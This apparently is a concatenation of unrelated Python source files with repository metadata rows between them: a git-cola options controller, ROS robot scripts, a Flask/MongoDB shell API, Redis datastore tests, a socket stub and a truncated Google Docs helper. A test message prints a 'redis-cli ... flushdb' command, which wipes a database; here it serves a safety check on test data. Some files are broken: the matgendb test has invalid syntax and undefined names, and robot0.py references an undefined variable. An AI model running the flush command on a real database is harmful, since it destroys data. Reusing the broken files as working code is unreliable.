parent = QtGui.QApplication.instance().activeWindow()
view = option.OptionsView(parent)
ctl = OptionsController(view)
view.show()
return view.exec_() == QtGui.QDialog.Accepted
class OptionsController(QObserver):
"""Provides control to the options dialog."""
def __init__(self, view):
## operate on a clone of the original model
QObserver.__init__(self, serializer.clone(cola.model()), view)
## used to restore original values when cancelling
self._backup_model = serializer.clone(cola.model())
## config params modified by the gui
self.add_observables('local_user_email',
'local_user_name',
'local_merge_summary',
'local_merge_diffstat',
'local_merge_verbosity',
'local_gui_diffcontext',
'global_user_email',
'global_user_name',
'global_merge_keepbackup',
'global_merge_summary',
'global_merge_diffstat',
'global_merge_verbosity',
'global_gui_editor',
'global_merge_tool',
'global_diff_tool',
'global_gui_diffcontext',
'global_gui_historybrowser',
'global_cola_fontdiff_size',
'global_cola_fontdiff',
'global_cola_savewindowsettings',
'global_cola_tabwidth')
# Refresh before registering callbacks to avoid extra notifications
self.refresh_view()
# Register actions
self.add_actions(global_cola_fontdiff = self.tell_parent_model)
self.add_callbacks(global_cola_fontdiff_size = self.update_size)
self.add_actions(global_cola_tabwidth = self.tell_parent_model)
self.add_callbacks(save_button = self.save_settings)
self.connect(self.view, SIGNAL('rejected()'), self.restore_settings)
def refresh_view(self):
"""Apply the configured font and update widgets."""
# The fixed-width console font
qtutils.set_diff_font(self.view.global_cola_fontdiff)
# Label the group box around the local repository
self.view.local_groupbox.setTitle(unicode(self.tr('%s Repository'))
% self.model.project)
QObserver.refresh_view(self)
def save_settings(self):
"""Save updated config variables back to git."""
params_to_save = []
params = self.model.config_params()
for param in params:
value = self.model.param(param)
backup = self._backup_model.param(param)
if value != backup:
params_to_save.append(param)
for param in params_to_save:
self.model.save_config_param(param)
# Update the main model with any changed parameters
cola.model().copy_params(self.model, params_to_save)
self.view.done(QtGui.QDialog.Accepted)
def restore_settings(self):
"""Reverts any changes done in the Options dialog."""
params = (self._backup_model.config_params() +
['global_cola_fontdiff_size'])
self.model.copy_params(self._backup_model, params)
self.tell_parent_model()
def tell_parent_model(self,*rest):
"""Notifies the main app's model about changed parameters"""
params= ('global_cola_fontdiff',
'global_cola_fontdiff_size',
'global_cola_savewindowsettings',
'global_cola_tabwidth')
for param in params:
cola.model().set_param(param, self.model.param(param))
def update_size(self, *rest):
"""Updates fonts whenever font sizes change"""
# The fixed-width console font combobox
font = str(self.view.global_cola_fontdiff.currentFont().toString())
default = self.model.global_cola_fontdiff or font
self.model.apply_diff_font_size(default)
self.tell_parent_model()
|
UTF-8
|
Python
| false | false | 2,011 |
8,169,027,805,871 |
353b4a50f902861ab1f96067cacbee6806e2184f
|
befd042aa00c92c7d53ea8fed4784ba0aa3884ac
|
/robot0.py
|
1ccf3379f1348b4bcdd09949a441e5554d276ffb
|
[] |
no_license
|
ThisNameNotUsed/atMudd
|
https://github.com/ThisNameNotUsed/atMudd
|
4326490014f1ea556bac36476c6f7af0d6e7ac8d
|
2b96b6cb5402938f7172ed86dfbe469438dc10e5
|
refs/heads/master
| 2020-04-15T05:38:54.391315 | 2014-06-04T17:51:28 | 2014-06-04T17:51:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
import roslib; roslib.load_manifest('irobot_mudd')
import rospy
import irobot_mudd
from std_msgs.msg import String
from irobot_mudd.srv import *
from irobot_mudd.msg import *
import time
import math
####
# robot0.py ~ starter file for scripting the Create with ROS
####
####
# D is our global system state
####
class Data: pass # empty class for a generic data holder
D = Data() # an object to hold our system's services and state
stream_name = 'text_data'
####
# main and init
####
def main():
""" the main program that gives our node a name,
sets up service objects, subscribes to topics (with a callback),
and then lets interactions happen!
"""
global D
# set up services and subscribe to data streams
init()
if message == 'w' :
D.tank(50,50)
if message == 'a' :
D.tank(0,25)
if message == 'd' :
D.tank(0,25)
if message == 's' :
D.tank(-50,-50)
if message == ' ' :
D.tank(0,0)
# sing!
#D.song([82,84,80,68,75], # notes
# [45,55,45,45,65]) # durations
# move!
#D.tank(100,100)
#time.sleep(2.0)
# reminder of Python's for loop:
#for i in range(2):
# print "i is", i
# finish up...
#D.tank(0,0)
#print "Goodbye!"
#D.led(1,1,50,100)
#print "Just kidding, Goodbye now!"
rospy.spin()
def init():
""" returns an object (tank) that allows you
to set the velocities of the robot's wheels
"""
global D # to hold system state
rospy.Subscriber( 'text_data', String, callback )
# we need to give our program a ROS node name
# the name is not important, so we use "lab1_node"
rospy.init_node('lab1_node', anonymous=True)
# we obtain the tank service
rospy.wait_for_service('tank') # wait until the motors are available
D.tank = rospy.ServiceProxy('tank', Tank) # D.tank is our "driver"
# we obtain the song service
rospy.wait_for_service('song') # wait until our voice is available
D.song = rospy.ServiceProxy('song', Song) # D.song is our "speaker"
# blinky blinky
rospy.wait_for_service('leds')
D.leds = rospy.ServiceProxy('leds', Leds)
####
# callback ~ called with each published message
####
def callback(data):
""" This function is called for each published message
"""
message = data.data
print "I received the string", message
# if the message is the string 'q', we shutdown
if message == 'q':
rospy.signal_shutdown("Quit requested.")
####
# It all starts here...
#
# This is the "main" trick: it tells Python what code to run
# when you execute this file as a stand-alone script:
####
if __name__ == "__main__":
main()
|
UTF-8
|
Python
| false | false | 2,014 |
17,772,574,679,366 |
29858d92b68810668f130938b8ac505afb818197
|
78cb29d6d1f09f8e6ef4e964d5557b3f3b5ec8ad
|
/restapi/views/csh_services.py
|
714c6e1544e077797e5b08b8a6a7012a1459a910
|
[] |
no_license
|
snoozan/onebarAPI
|
https://github.com/snoozan/onebarAPI
|
d3bfc984f350f45dfc35615aa1a052547eea677d
|
338c5c83bc23900e6fe08b4dc1876ab9d9dbb316
|
refs/heads/master
| 2021-01-14T08:50:19.584689 | 2014-04-03T01:03:33 | 2014-04-03T01:03:33 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from restapi.validators import JSON, ValidFields
from restapi.services import cshServices, allcshServices
from restapi.models import DBSession, CSH_Services
from sqlalchemy import desc
from pyramid.httpexceptions import HTTPForbidden
import json
@cshServices.get(renderer='json')
def getServiceByID(request):
"""
<-
{
'id': <>
'icon': <>
'name': <>
'url': <>
}
"""
for service in DBSession.query(CSH_Services).order_by(CSH_Services.id):
if service.id == int(request.GET['id']):
return{
'id': service.id,
'icon': service.icon,
'name': service.name,
'url': service.url
}
return HTTPForbidden()
@allcshServices.get(renderer='json')
def getServices(request):
"""
<-
{
all service objects
{
'id': <>
'icon': <>
'name': <>
'url': <>
}
}
"""
arr = []
for csh_service in DBSession.query(CSH_Services).order_by(CSH_Services.id):
service_wrapper = {}
service_wrapper['id'] = csh_service.id
service_wrapper['icon'] = csh_service.icon
service_wrapper['name'] = csh_service.name
service_wrapper['url'] = csh_service.url
arr.append(service_wrapper)
return arr
@cshServices.delete(renderer = 'json')
def deleteService(request):
for service in DBSession.query(CSH_Services).order_by(CSH_Services.id):
if service.name == request.GET['name']:
DBSession.delete(service)
return {
'success': True
}
@cshServices.post(validators=[JSON, ValidFields('name','icon','url')])
def addService(request):
"""
->
{
'name'
'icon'
'url'
}
<-
{
'success': True
'id': <>
'icon': <>
'name': <>
'url': <>
}
"""
if (len(DBSession.query(CSH_Services).order_by(desc(CSH_Services.id)).all()) == 0):
service_id = 0
else:
service_id = DBSession.query(CSH_Services).order_by(desc(CSH_Services.id)).first().id + 1
new_service = CSH_Services(
id = service_id,
icon = request.json_body['icon'],
name = request.json_body['name'],
url = request.json_body['url']
)
DBSession.add(new_service)
return {
'success': True,
'id': new_service.id,
'icon': new_service.icon,
'name': new_service.name,
'url': new_service.url
}
|
UTF-8
|
Python
| false | false | 2,014 |
13,262,859,015,616 |
41d3621d8bdc26484c7a2fb9dcf1afb66ee9b95a
|
8922f3b28329b32d5438cc13b903f742322f9301
|
/webapps/server/views.py
|
a596fc53280657db96311c7e7e32624b1d89a93e
|
[
"Apache-2.0"
] |
permissive
|
glowe/mongo-web-shell
|
https://github.com/glowe/mongo-web-shell
|
f82a901ad2ca93d4badb4461b62d85f8b6f54618
|
ffe2646116b8ef323892dac2cfee41ccb3aaa3b2
|
refs/heads/master
| 2016-11-03T03:34:50.002664 | 2014-05-19T19:37:22 | 2014-05-19T19:37:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Copyright 2013 10gen Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from datetime import datetime, timedelta
from functools import update_wrapper
import uuid
from bson import BSON
from bson.json_util import dumps, loads
from flask import Blueprint, current_app, make_response, request, session
app = current_app
from pymongo.errors import (InvalidDocument, OperationFailure,
InvalidId, DuplicateKeyError)
from webapps.lib import CLIENTS_COLLECTION
from webapps.lib.MWSServerError import MWSServerError
from webapps.lib.db import get_db
from webapps.lib.decorators import check_session_id, ratelimit
from webapps.lib.util import (
UseResId,
get_collection_names
)
mws = Blueprint('mws', __name__, url_prefix='/mws')
def generate_res_id():
return str(uuid.uuid4())
def empty_success():
return '', 204
def parse_get_json():
try:
request_data = request.data or request.args['data']
if request_data:
request.json = loads(request_data)
else:
request.json = {}
except (InvalidId, TypeError, ValueError) as e:
raise MWSServerError(400, str(e))
def to_json(result):
try:
return dumps(result), 200
except ValueError:
error = 'Error in find while trying to convert the results to ' + \
'JSON format.'
raise MWSServerError(500, error)
@mws.after_request
def no_cache(response):
response.cache_control.no_cache = True
response.headers['Expires'] = 0
return response
def validate_document_or_list(document):
if isinstance(document, list):
for d in document:
validate_document(d)
else:
validate_document(document)
def validate_document(document):
if not isinstance(document, dict):
raise MWSServerError(400,
u"Could not validate '{0}', expected a document".format(document))
try:
BSON.encode(document)
except (InvalidDocument,
TypeError,
InvalidId,
BSONError,
InvalidBSON,
InvalidStringData
) as e:
raise MWSServerError(400, str(e))
def calculate_document_size(document):
req_size = 0
if isinstance(document, list):
for d in document:
req_size += calculate_document_size(d)
else:
req_size = len(BSON.encode(document))
return req_size
@mws.route('/', methods=['POST'])
def create_mws_resource():
session_id = session.get('session_id', str(uuid.uuid4()))
session['session_id'] = session_id
clients = get_db()[CLIENTS_COLLECTION]
cursor = clients.find({'session_id': session_id}, {'res_id': 1, '_id': 0})
if cursor.count():
# TODO: handle multiple res_id per session
res_id = cursor[0]['res_id']
is_new = False
else:
res_id = generate_res_id()
clients.insert({
'version': 1,
'res_id': res_id,
'collections': [],
'session_id': session_id,
'timestamp': datetime.now()
})
is_new = True
return to_json({'res_id': res_id, 'is_new': is_new})
@mws.route('/<res_id>/keep-alive', methods=['POST'])
@check_session_id
def keep_mws_alive(res_id):
clients = get_db()[CLIENTS_COLLECTION]
clients.update({'session_id': session.get('session_id'), 'res_id': res_id},
{'$set': {'timestamp': datetime.now()}})
return empty_success()
# Read Methods
@mws.route('/<res_id>/db/<collection_name>/find', methods=['GET'])
@check_session_id
@ratelimit
def db_collection_find(res_id, collection_name):
parse_get_json()
query = request.json.get('query')
projection = request.json.get('projection')
skip = request.json.get('skip', 0)
limit = request.json.get('limit', 0)
sort = request.json.get('sort', {})
sort = sort.items()
with UseResId(res_id) as db:
coll = db[collection_name]
try:
cursor = coll.find(query, projection, skip, limit)
if len(sort) > 0:
cursor.sort(sort)
documents = list(cursor)
except (InvalidId, TypeError, OperationFailure) as e:
raise MWSServerError(400, str(e))
return to_json({'result': documents})
@mws.route('/<res_id>/db/<collection_name>/count', methods=['GET'])
@check_session_id
@ratelimit
def db_collection_count(res_id, collection_name):
parse_get_json()
query = request.json.get('query')
with UseResId(res_id) as db:
coll = db[collection_name]
try:
count = coll.find(query).count()
return to_json({'count': count})
except InvalidDocument as e:
raise MWSServerError(400, str(e))
@mws.route('/<res_id>/db/<collection_name>/aggregate', methods=['GET'])
@check_session_id
def db_collection_aggregate(res_id, collection_name):
parse_get_json()
with UseResId(res_id) as db:
try:
result = db[collection_name].aggregate(request.json)
except (InvalidId,
TypeError,
InvalidDocument,
OperationFailure) as e:
raise MWSServerError(400, str(e))
return to_json(result)
# Write Methods
@mws.route('/<res_id>/db/<collection_name>/insert', methods=['POST'])
@check_session_id
@ratelimit
def db_collection_insert(res_id, collection_name):
parse_get_json()
document = request.json.get('document')
if document is None:
raise MWSServerError(400,
"no object passed to insert!")
validate_document_or_list(document)
req_size = calculate_document_size(document)
# Insert document
with UseResId(res_id) as db:
# Check quota
size = db[collection_name].size()
if size + req_size > current_app.config['QUOTA_COLLECTION_SIZE']:
raise MWSServerError(403, 'Collection size exceeded')
# Attempt Insert
try:
_id = db[collection_name].insert(document)
except (DuplicateKeyError, OperationFailure) as e:
raise MWSServerError(400, str(e))
return to_json({'_id': _id})
@mws.route('/<res_id>/db/<collection_name>/update', methods=['PUT'])
@check_session_id
@ratelimit
def db_collection_update(res_id, collection_name):
parse_get_json()
query = request.json.get('query')
update = request.json.get('update')
upsert = request.json.get('upsert', False)
multi = request.json.get('multi', False)
if query is None or update is None:
error = 'update requires spec and document arguments'
raise MWSServerError(400, error)
with UseResId(res_id) as db:
# Check quota
coll = db[collection_name]
# Computation of worst case size increase - update size * docs affected
# It would be nice if we were able to make a more conservative estimate
# of the space difference that an update will cause. (especially if it
# results in smaller documents)
# TODO: Make this more intelligent. I'm not sure that this even makes sense.
affected = coll.find(query).count()
req_size = calculate_document_size(update) * affected
size = db[collection_name].size()
if size + req_size > current_app.config['QUOTA_COLLECTION_SIZE']:
raise MWSServerError(403, 'Collection size exceeded')
# Attempt Update
try:
db[collection_name].update(query, update, upsert, multi=multi)
return empty_success()
except (DuplicateKeyError,
InvalidDocument,
InvalidId,
TypeError,
OperationFailure) as e:
raise MWSServerError(400, str(e))
@mws.route('/<res_id>/db/<collection_name>/save', methods=['POST'])
@check_session_id
@ratelimit
def db_collection_save(res_id, collection_name):
parse_get_json()
document = request.json.get('document')
if document is None:
raise MWSServerError(400,
"'document' argument not found in the save request.")
validate_document(document)
req_size = calculate_document_size(document)
# Get database
with UseResId(res_id) as db:
# Check quota
size = db[collection_name].size()
if size + req_size > current_app.config['QUOTA_COLLECTION_SIZE']:
raise MWSServerError(403, 'Collection size exceeded')
# Save document
try:
db[collection_name].save(document)
return empty_success()
except (InvalidId, TypeError, InvalidDocument, DuplicateKeyError) as e:
raise MWSServerError(400, str(e))
@mws.route('/<res_id>/db/<collection_name>/remove', methods=['DELETE'])
@check_session_id
@ratelimit
def db_collection_remove(res_id, collection_name):
parse_get_json()
constraint = request.json.get('constraint') if request.json else {}
just_one = request.json and request.json.get('just_one', False)
with UseResId(res_id) as db:
collection = db[collection_name]
try:
if just_one:
collection.find_and_modify(constraint, remove=True)
else:
collection.remove(constraint)
except (InvalidDocument, InvalidId, TypeError, OperationFailure) as e:
raise MWSServerError(400, str(e))
return empty_success()
@mws.route('/<res_id>/db/<collection_name>/drop', methods=['DELETE'])
@check_session_id
@ratelimit
def db_collection_drop(res_id, collection_name):
with UseResId(res_id) as db:
db.drop_collection(collection_name)
return empty_success()
@mws.route('/<res_id>/db', methods=['DELETE'])
@check_session_id
def db_drop(res_id):
with UseResId(res_id) as db:
db.drop_database()
return empty_success()
@mws.route('/<res_id>/db/getCollectionNames', methods=['GET'])
@check_session_id
def db_get_collection_names(res_id):
return to_json({'result': get_collection_names(res_id)})
|
UTF-8
|
Python
| false | false | 2,014 |
16,174,846,881,038 |
506936d97fa3b4c57556e9267e03e7df0e289571
|
b5db4abae9a6fbaa514d0e9aa081a84d3901ad0c
|
/goanna/tests/test_goanna_datastore.py
|
627d953b52e39760a483747fc52af2983a9299a3
|
[
"BSD-2-Clause"
] |
permissive
|
shawnchin/goanna
|
https://github.com/shawnchin/goanna
|
f898715e03d43666d058596f1197ed6a5981d0ea
|
7998ffa7cabf3a6168de62dee54468f84950ca36
|
refs/heads/master
| 2016-09-05T19:57:42.772422 | 2012-12-17T16:55:00 | 2012-12-17T16:55:00 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import unittest
from goanna.datastore import DictStore, RedisStore
from goanna.exceptions import DatastoreError
class DictStoreTestCase(unittest.TestCase):
def setUp(self):
self.d = DictStore()
# patch for python <2.7
if not hasattr(self, "assertIsNone"):
def _assert_is_none(v):
self.assertTrue(v == None)
self.assertIsNone = _assert_is_none
def test_basic_query(self):
self.d.store("k1", "v1")
self.d.store("k3", "v3")
data = {"k5": "v5", "k7": "v7"}
self.d.store_many(data.iteritems())
self.assertIsNone(self.d.retrieve("k2"))
self.assertIsNone(self.d.retrieve("k6"))
self.assertEqual(self.d.retrieve("k1"), "v1")
self.assertEqual(self.d.retrieve("k5"), "v5")
self.assertEqual(self.d.delete("k2"), 0)
self.assertEqual(self.d.delete("k6"), 0)
self.assertEqual(self.d.delete("k1"), 1)
self.assertEqual(self.d.delete("k5"), 1)
self.assertIsNone(self.d.retrieve("k1"))
self.assertIsNone(self.d.retrieve("k5"))
self.assertEqual(self.d.retrieve("k3"), "v3")
self.assertEqual(self.d.retrieve("k7"), "v7")
def test_encoding(self):
self.d.store("v_int", 100)
self.d.store("v_list", [1, 2])
self.d.store("v_unicode", unicode("hello"))
self.assertEqual(self.d.retrieve("v_int"), "100")
self.assertEqual(self.d.retrieve("v_list"), "[1, 2]")
self.assertEqual(self.d.retrieve("v_unicode"), "hello")
def test_sorted_set(self):
d = self.d
self.assertIsNone(d.sortedset_retrieve_latest("sk"))
d.sortedset_add("sk", "v1", 101.01)
d.sortedset_add("sk", "v2", 102.01)
self.assertEqual(d.sortedset_retrieve_latest("sk"), ("v2", 102.01))
d.sortedset_add_many([
("sk", "v3", 304.01),
("sk", "v4", 405.01),
("sk", "v1", 900.91) # updates v1
])
self.assertEqual(d.sortedset_retrieve_latest("sk"), ("v1", 900.91))
# retrive using various ranges
self.assertEqual(d.sortedset_retrieve_range("sk"),
["v2", "v3", "v4", "v1"])
self.assertEqual(d.sortedset_retrieve_range("sk", 102.01),
["v3", "v4", "v1"])
self.assertEqual(d.sortedset_retrieve_range("sk", upper=304.01),
["v2"])
self.assertEqual(d.sortedset_retrieve_range("sk", 102.01, 405.1001),
["v3", "v4"])
self.assertEqual(d.sortedset_retrieve_range("sk", 900.91), [])
self.assertEqual(d.sortedset_retrieve_range("sk", upper=101.01), [])
# delete by range
self.assertEqual(d.sortedset_delete_range("sk", lower=900.91), 0)
self.assertEqual(len(d.sortedset_retrieve_range("sk")), 4)
self.assertEqual(d.sortedset_delete_range("sk", upper=100.11), 0)
self.assertEqual(len(d.sortedset_retrieve_range("sk")), 4)
self.assertEqual(d.sortedset_delete_range("sk", 305.01, 405.01), 0)
self.assertEqual(len(d.sortedset_retrieve_range("sk")), 4)
self.assertEqual(d.sortedset_delete_range("sk", 300.01, 410.01), 2)
self.assertEqual(d.sortedset_retrieve_range("sk"), ["v2", "v1"])
class RedisStoreTestCase(unittest.TestCase):
def setUp(self):
params = {
"host": "localhost",
"port": 6379,
"db": 9
}
self.d = RedisStore(**params)
# Access the redis client directly and ensure that the test db is
# currently empty (so we don't accidentally change production data)
if self.d.r.dbsize() != 0:
raise Exception("""SELECTED REDIS DB NOT EMPTY.
Using: %(host)s:%(port)d (db %(db)d)
To proceed, make sure that is not your production db. Once you're certain
you can flush that db by running:
redis-cli -h %(host)s -p %(port)d -n %(db)d flushdb
""" % params)
# patch for python <2.7
if not hasattr(self, "assertIsNone"):
def _assert_is_none(v):
self.assertTrue(v == None)
self.assertIsNone = _assert_is_none
def tearDown(self):
self.d.r.flushdb() # flush testdb before quitting
def test_basic_query(self):
self.d.store("k1", "v1")
self.d.store("k3", "v3")
data = {"k5": "v5", "k7": "v7"}
self.d.store_many(data.iteritems())
self.assertIsNone(self.d.retrieve("k2"))
self.assertIsNone(self.d.retrieve("k6"))
self.assertEqual(self.d.retrieve("k1"), "v1")
self.assertEqual(self.d.retrieve("k5"), "v5")
self.assertEqual(self.d.delete("k2"), 0)
self.assertEqual(self.d.delete("k6"), 0)
self.assertEqual(self.d.delete("k1"), 1)
self.assertEqual(self.d.delete("k5"), 1)
self.assertIsNone(self.d.retrieve("k1"))
self.assertIsNone(self.d.retrieve("k5"))
self.assertEqual(self.d.retrieve("k3"), "v3")
self.assertEqual(self.d.retrieve("k7"), "v7")
def test_sorted_set(self):
d = self.d
self.assertIsNone(d.sortedset_retrieve_latest("sk"))
d.sortedset_add("sk", "v1", 101.0)
d.sortedset_add("sk", "v2", 102.0)
self.assertEqual(d.sortedset_retrieve_latest("sk"), ("v2", 102.0))
d.sortedset_add_many([
("sk", "v3", 304.0),
("sk", "v4", 405.0),
("sk", "v1", 900.9) # updates v1
])
self.assertEqual(d.sortedset_retrieve_latest("sk"), ("v1", 900.9))
# retrive using various ranges
self.assertEqual(d.sortedset_retrieve_range("sk"),
["v2", "v3", "v4", "v1"])
self.assertEqual(d.sortedset_retrieve_range("sk", 102.0),
["v3", "v4", "v1"])
self.assertEqual(d.sortedset_retrieve_range("sk", upper=304.0),
["v2"])
self.assertEqual(d.sortedset_retrieve_range("sk", 102.0, 405.00001),
["v3", "v4"])
self.assertEqual(d.sortedset_retrieve_range("sk", 900.9), [])
self.assertEqual(d.sortedset_retrieve_range("sk", upper=101.0), [])
# delete by range
self.assertEqual(d.sortedset_delete_range("sk", lower=900.9), 0)
self.assertEqual(len(d.sortedset_retrieve_range("sk")), 4)
self.assertEqual(d.sortedset_delete_range("sk", upper=100), 0)
self.assertEqual(len(d.sortedset_retrieve_range("sk")), 4)
self.assertEqual(d.sortedset_delete_range("sk", 305, 405.0), 0)
self.assertEqual(len(d.sortedset_retrieve_range("sk")), 4)
self.assertEqual(d.sortedset_delete_range("sk", 300, 410.0), 2)
self.assertEqual(d.sortedset_retrieve_range("sk"), ["v2", "v1"])
|
UTF-8
|
Python
| false | false | 2,012 |
14,396,730,379,032 |
982bbb210118dcc2b92f2fd5ace5766a80b76d36
|
fb3d5b9ce8fee4f87c9b1426afdf446188656052
|
/projector_interface/study/configure_screen.py
|
3ba4d9127aa74980d16fcc1f7ec15717c0e4d3a3
|
[] |
no_license
|
OSUrobotics/ros-3d-interaction
|
https://github.com/OSUrobotics/ros-3d-interaction
|
9e25ed88a5226e2a5640f213572b6d4c79e843df
|
d5419cbaebec704469b0cc0992654c8ca40a7c79
|
refs/heads/groovy-devel
| 2016-08-07T09:41:04.899680 | 2014-03-27T20:00:09 | 2014-03-27T20:00:09 | 6,081,570 | 4 | 1 | null | false | 2013-05-01T15:33:47 | 2012-10-04T20:33:18 | 2013-05-01T15:33:46 | 2013-05-01T15:19:42 | 1,060 | null | 0 | 3 |
Python
| null | null |
#!/usr/bin/env rosh
load('rosh_geometry', globals())
from lxml import etree
from lxml.etree import Element
import os
from tf.transformations import quaternion_from_euler
from math import pi
def make_tf_pub(parent, child, transform):
attribs = dict(
parent=parent,
child=child,
x=transform.pose.position.x,
y=transform.pose.position.y,
z=transform.pose.position.z,
qx=transform.pose.orientation.x,
qy=transform.pose.orientation.y,
qz=transform.pose.orientation.z,
qw=transform.pose.orientation.w
)
tr = Element(
'node',
type='static_transform_publisher',
pkg='tf',
name='%s_to_%s' % (parent, child),
args='%(x)s %(y)s %(z)s %(qx)s %(qy)s %(qz)s %(qw)s %(parent)s %(child)s 100' % attribs
)
return tr
top_right = 'top_right'
bottom_left = 'bottom_left'
# top level launch file
launch_tree = Element('launch')
launch_tree.append(Element(
'param',
name='/screen/frame',
value=bottom_left,
))
# make a static transform publisher for the bottom left marker
# this is the frame the interface is composed in
transforms._config.listener.waitForTransform(bottom_left, top_right, Time(0), Duration(5))
parent = transforms[bottom_left]._config.listener.chain(bottom_left, Time(0), '/', Time(0), '/')[0]
tr = transforms[parent](bottom_left)
elem = make_tf_pub(parent, bottom_left, tr)
launch_tree.append(elem)
# add some args for the optical rotate
elem_pi = Element('arg', name='pi/2', value='1.5707963267948966')
elem_optical_rotate = Element('arg', name='optical_rotate', value='0 0 0 -$(arg pi/2) 0 -$(arg pi/2)')
launch_tree.append(elem_pi)
launch_tree.append(elem_optical_rotate)
# first we need the camera link
parent = 'projector_cam_rgb_optical_frame'
transform = PoseStamped(frame_id='world', position=Point(0,0,0.5), orientation=Quaternion(0,0,0,1))
elem = make_tf_pub('world', 'projection_cam_link', transform)
launch_tree.append(elem)
# now we need to reorient things for the optical frame
# x = right (forward)
# y = down (left)
# z = forward (up)
transform = PoseStamped(frame_id='world', position=Point(0,0,0.5), orientation=Quaternion(*quaternion_from_euler(-pi/2,0,-pi/2)))
# elem = make_tf_pub('projection_cam_link', parent, transform)
elem_projection_cam_optical_rotate = Element(
'node',
type='static_transform_publisher',
pkg='tf',
name='projector_cam_optical_rotate',
args='$(arg optical_rotate) projection_cam_link %s 100' % parent
)
launch_tree.append(elem_projection_cam_optical_rotate)
# make a transform for the kinect
# same place as camera, but pointing backwards
orientation = quaternion_from_euler(0,0,pi)
transform.pose.orientation = Quaternion(*orientation)
transform.child_frame_id = 'face_cam_link'
elem = make_tf_pub('world', 'face_cam_link', transform)
launch_tree.append(elem)
# figure out how big the screen is
tr = transforms.bottom_left('top_right')
width, height = tr.pose.position.x, tr.pose.position.y
launch_tree.append(Element(
'param',
name='/screen/width',
value=str(width),
type='double'
))
launch_tree.append(Element(
'param',
name='/screen/height',
value=str(height),
type='double'
))
rospy.set_param('/screen/width', str(width))
rospy.set_param('/screen/height', str(height))
# wait for a homography
import rospy
while not rospy.has_param('/homography'):
rospy.sleep(0.1)
homography = rospy.get_param('/homography')
elem_h = Element('rosparam', param='/homography')
elem_h.text = str(homography)
launch_tree.append(elem_h)
launch_path = os.path.join(roslib.packages.get_pkg_dir('projector_interface'), 'study', 'launch', 'setup.launch')
# with etree.xmlfile(launch_path) as lf:
with open(launch_path, 'w') as lf:
lf.write(etree.tostring(launch_tree, pretty_print=True))
print 'wrote', launch_path
# print etree.tostring(launch_tree, pretty_print=True)
|
UTF-8
|
Python
| false | false | 2,014 |
3,461,743,669,065 |
b00d1fe78d5c91d786b2195b70e74b41f776e83f
|
064034a86bcd50481df1eb73fffc8b9f3ad19fbd
|
/matgendb/test_creator.py
|
7f4ec25f9fb9f909e8f246a47a9045cbdf2361ef
|
[
"MIT"
] |
permissive
|
cmgtam/pymatgen-db
|
https://github.com/cmgtam/pymatgen-db
|
82a395c051563aee572a599986da2f80a0a6de8e
|
01c6e9ee978c0ca12eb6b30b322beadeac0d0950
|
refs/heads/master
| 2021-01-15T23:27:31.006036 | 2013-06-24T19:22:09 | 2013-06-24T19:22:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import pymatgen
import os
import shutil
import sys
import unittest
import time
import filecmp
from filecmp import dircmp
from pymatgen.io.vaspio import Poscar
class TestCreator(unittest.TestCase):
def setUp(self):
myclass = NEBToDbTaskDrone("")
pass
#maybe mgdb insert? use mymgdb = subprocess.Popen(["mgdb insert -c ..."], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def tearDown(self):
#maybe create a different db.json file so the next test is a new database?
pass
def test_contour(self):
#either run the query and get output
#mymgdb.communicate()[0] ???
#or
#test myclass.d['energy_contour'] etc. directly
testcontour = myclass.d['energy_contour']
self.assertEquals(testcontour, "-x-/-x-\-x-")
def test_maxminmin(self):
energy00=util2.get_energy("OSZICAR00")
energy01=...
energy02=...
maxminmin = max([energy00,energy01,energy02]])-min([...)
self.assertEquals(myclass.d['maxminmin'], maxminmin)
|
UTF-8
|
Python
| false | false | 2,013 |
11,957,188,953,603 |
ecb02678afaebfbec47cd396802f24d68965bc4f
|
c22deca4a74ef2898521892546a32f5ceafca21f
|
/server.py
|
bcdf144c46f4c7513502b047f3f8a0ba21594f86
|
[] |
no_license
|
ChristofferHolmesland/ms-kart
|
https://github.com/ChristofferHolmesland/ms-kart
|
54b3ed13eb31777337f6b19e1fd32e1a116ba729
|
e4ef79ccc9954836e64dfe674ad0b348b41e0e7c
|
refs/heads/master
| 2015-08-12T02:29:01.347534 | 2014-06-25T14:06:54 | 2014-06-25T14:06:54 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
#server.py
import socket
import sys
HOST = None # '' - string
PORT = None # 8888 - integer
s = None # socket.socket() - socket
def startServer(socket_s, string_host, integer_port):
try:
socket_s.bind((string_host, integer_port))
except socket.error, msg:
return False
socket_s.listen(100)
conn, addr = socket_s.accept()
if __name__ == '__main__':
HOST = ''
PORT = 8888
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
startServer(s, HOST, PORT)
|
UTF-8
|
Python
| false | false | 2,014 |
4,286,377,388,364 |
01ec460da8698efed09249696e7d8c206f850904
|
6419ec2206e2f8a1f6eae9e059da847309be1eea
|
/google_docs_helpers.py
|
8aa4a592ace38ff7eaf4f69a4204d4285cf2b679
|
[
"MIT"
] |
permissive
|
nesaro/google_docs_helpers
|
https://github.com/nesaro/google_docs_helpers
|
f087673896f14349392d04d1739cb8333be7e8d1
|
c96abe7ac4dc04b4e20af0d06dd8f63196b8391a
|
refs/heads/master
| 2021-01-23T20:00:19.390531 | 2014-09-12T09:31:33 | 2014-09-12T09:31:33 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#TODO: sort logging, better worksheet identifies (helpers?)
import gdata.spreadsheet
import gdata.docs.service
import gdata.spreadsheet.service
import re
import logging
from collections import OrderedDict
class GoogleSpreadsheetsClient():
""" Set up Google spreadsheets client """
def __init__(self, gmailUsername, gmailPassword, sSourceName='Default', bDebug=False):
self.log = logging.getLogger('gDocsLogger')
self.spr_client = gdata.spreadsheet.service.SpreadsheetsService()
